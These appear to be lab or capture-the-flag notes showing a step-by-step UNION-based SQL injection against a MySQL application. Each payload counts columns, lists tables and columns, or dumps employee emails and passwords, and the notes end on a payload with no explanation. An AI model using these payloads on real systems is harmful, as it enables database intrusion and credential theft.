Vulnerable to
`" ORDER BY 4;# ` 
  Determines how many columns are in Album
`" UNION SELECT 1,2,3,4;# ` 
  Begins building our union process
`" UNION SELECT 1,2,table_name,4 FROM information_schema.tables WHERE table_schema=database();# ` 
  Finds out all the tables in the MySQL database
`" UNION SELECT 1,2,column_name,4 FROM information_schema.columns WHERE table_name="employee";# ` 
  Finds out all the columns in the employee table
`" UNION SELECT FirstName,LastName,email,password FROM employee;# ` 
  Leaks employee information
`" UNION SELECT email,password,1,2 FROM employee;# ` 